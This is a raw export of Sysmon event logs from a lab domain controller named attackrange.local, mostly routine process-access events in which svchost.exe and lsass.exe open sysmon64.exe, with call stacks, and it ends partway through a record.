16341600x80000000000000001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local2021-01-14 13:08:38.497c:\Program Files\ansible\AttackRangeSysmon.xmlSHA256=810DB7BCF7285146B1EB0BDF1FADAD1346430C24FD03C606675FC7F52A36799D 13241300x800000000000000036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:08:39.825{08A6967A-40E0-6000-1100-000000009901}1204C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea76-0x6064a9a6) 10341000x800000000000000035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.513{08A6967A-40E0-6000-1400-000000009901}13002024C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.482{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.466{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.466{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.466{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 